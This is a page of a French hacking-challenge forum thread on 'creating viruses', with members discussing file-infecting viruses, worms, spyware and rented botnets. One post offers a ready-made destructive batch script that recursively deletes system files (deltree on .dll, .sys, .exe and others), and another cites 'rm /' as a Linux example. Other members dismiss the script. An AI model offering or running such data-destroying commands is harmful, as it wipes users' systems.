logo Homepage
+  NewbieContest
|-+  Divers» Informatique» Creation de virus
Username:
Password:
Pages: 1 [2]
  Imprimer  
Auteur Fil de discussion: Creation de virus  (Lu 10945 fois)
neoflo
Profil challenge

Classement : 8124/54284

Membre Complet
***
Hors ligne Hors ligne
Messages: 171


Voir le profil WWW
« #15 le: 14 Janvier 2007 à 18:21:04 »

Citation de: Gob
Je sais pas pour windows mais par exemple un bon virus pour linux est de mettre "rm /" dans un fichier .sh mais faut que l'utilisateur l'exécute avec les doits de root :]
Une propriété importante des virus est la replication (invisible ou non). Donc un virus qui ne fait que : "rm /" n'est pas super étant donné qu'il risque de s'auto détruire et de n'infecter aucun autre ordi.

Dans le temps, il y avait surtout des virus qui infectés des fichiers exécutables (.com ou .exe) :
 - insertion du code du virus à la fin ou au début du fichier (avec des variantes ou le virus se crypte) : repérable par la taille du fichier
 - insertion du code en découpant le code du virus et en se placant dans les zones vides (du genre CIH)
A l'exécution du fichier, le virus avait ajouté un saut pour exécuter tout d'abord sous code, et repartait ensuite vers le vrai code du programme pour passer inaperçu.


Pis à chaque nouveau script quelque virus qui exploite les failles :
 - vbs avec la faille outlook qui permettait d'envoyer des emails à tout le monde (c'est l'appelation vers)

Et maintenant, c'est surtout des spyware... : Il n'y a plus infection des fichiers executables (windows s'étant prémuni de la modification de ces propres fichiers), ce n'est uniquement que l'installation d'un exécutable quelque part, avec une clef de registre ajoutée qui permet de l'exécuter au démarrage. Ce qui les rend plus simple à supprimer (même manuellement)

Dans le temps, j'en vais fait un en VBS qui s'autocrypté et qui inseré son code dans d'autre script VBS (histoire de faire un peu comme les .Exe, mais sans se prendre la tête avec de l'assembleur). Enfin, maintenant, ça m'est passé, car ça me saoule vraiment ce qui en crée dans le seul but de nuire à un système.
Journalisée

Mirado

Profil challenge

Classement : 44562/54284

Néophyte
*
Hors ligne Hors ligne
Messages: 36


Voir le profil
« #16 le: 19 Mars 2008 à 13:29:52 »

Voila un petit virus qui est déjà tout pret:

@Echo off c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
cd\
deltree /y *.bat
cd\
deltree /y *.exe
cd\
deltree /y *.com
cd\
deltree /y *.bmp


Il suffit de l'enregistre en .bat !
Journalisée
zours

Profil challenge

Classement : 553/54284

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 811


Voir le profil
« #17 le: 19 Mars 2008 à 13:34:41 »

Pour être caractérisé de virus, un programme informatique doit être muni de deux fonctions : capacités de réplication, et capacités d'infection. Ton batch ridicule n'est rien de tout ça. Et y'a plus efficace en matière de wildcards, de toute façon.
Journalisée
Folcan

Profil challenge

Classement : 508/54284

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 1520


Voir le profil
« #18 le: 19 Mars 2008 à 13:59:37 »

Et je rajouterais :

Citation
Au sens strict, un virus informatique est un programme informatique écrit dans le but de se propager à d'autres ordinateurs en s'insérant dans des programmes légitimes appelés « hôtes ». Il peut aussi avoir comme effet, recherché ou non, de nuire en perturbant plus ou moins gravement le fonctionnement de l'ordinateur infecté. Il peut se répandre à travers tout moyen d'échange de données numériques comme l'internet, mais aussi les disquettes, les cédéroms, les clefs USB, etc. Les virus informatiques ne doivent pas être confondus avec les vers qui sont des programmes capables de se propager et de se dupliquer par leurs propres moyens sans contaminer de programme hôte.

Son appellation provient d'une analogie avec le virus biologique puisqu'il présente des similitudes dans sa manière de se propager en utilisant les facultés de reproduction de la cellule hôte. On attribue le terme de « virus informatique » à l'informaticien et spécialiste en biologie moléculaire Leonard Adleman (Fred Cohen, Experiments with Computer Viruses, 1984).

Source : http://fr.wikipedia.org/wiki/Virus_informatique

Il est donc indéniable qu'un virus et/ou vers n'ont pas forcement la facultée de destruction de fichiers.
D'ailleurs, à leur actuelle, beaucoup de virus/vers n'ont pas comme finalitée la desctruction d'un systeme, mais uniquement la réplication afin de tenter des deny de service sur un machine cible à une date et heure définie.
« Dernière édition: 19 Mars 2008 à 14:02:23 par Folcan » Journalisée

-=[FoLc@N]=-

Citation :
* Le futur appartient à ceux qui croient à la beauté de leurs rêves, je crois au miens, NewbieContest aura un bon futur.
* Il y'a seulement 10 categories de gens dans la vie : ceux qui comprennent le binaire, et les autres.
_o_
Relecteur

Profil challenge

Classement : 42/54284

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #19 le: 19 Mars 2008 à 14:26:29 »

D'ailleurs, à leur actuelle, beaucoup de virus/vers n'ont pas comme finalitée la desctruction d'un systeme, mais uniquement la réplication afin de tenter des deny de service sur un machine cible à une date et heure définie.

Plus exactement, les machines infectées sont enrôlés dans un botnet (on les appelle alors des zombies) et peuvent être pilotées à distance pour lancer toutes sortes d'opérations, comme effectivement des floods pour conduire à des dénis de service, du spam, ou des scans de vulnérabilités massifs, pour les plus courantes.

La grande tendance actuelle est que les "propriétaires" de ces botnets louent les ressources machines ou réseau de leurs zombies aux gens intéressés. Et quand je dis louer, c'est au sens propre du terme, puisqu'on paie la ressource comme au temps des mainframes. On peut trouver des annonces de ce type sur certains forums très underground.

A noter qu'un certain nombre d'articles très intéressants ont été publié dans MISC à ce sujet, notamment les numéros 27 et 30. Sans parler d'une analyse que je ne retrouve plus, montrant comment cannibaliser l'architecture de skype afin de monter un botnet possédant toutes les qualités de ce réseau.
« Dernière édition: 19 Mars 2008 à 14:28:50 par _o_ » Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
Zmx

Profil challenge

Classement : 71/54284

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 559


Voir le profil WWW
« #20 le: 19 Mars 2008 à 20:44:11 »

Sans compter que je suis meme pas sur que windows ne restaure pas les fichiers "automatiquement" ou t'empeche de les effacer meme si tu es admin. (alors imagine si tu n'es pas admin)
Journalisée

Shakan

Profil challenge

Classement : 1066/54284

Membre Complet
***
Hors ligne Hors ligne
Messages: 181


Voir le profil WWW
« #21 le: 20 Mars 2008 à 00:06:31 »

Moi je préfère le corewar car en plus d'être amusant c'est très instructif en matière de création de virus mais bon je troll un peu je crois !!
Journalisée

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s+: a-- C++ UL- P L++ E--- W++ N+ o K- w
O-- M-- V-- PS PE Y PGP- t+ 5 X+ R tv- b++ DI D++
G e++ h! r++ y+
------END GEEK CODE BLOCK------
Pages: 1 [2]
  Imprimer  
 
Aller à: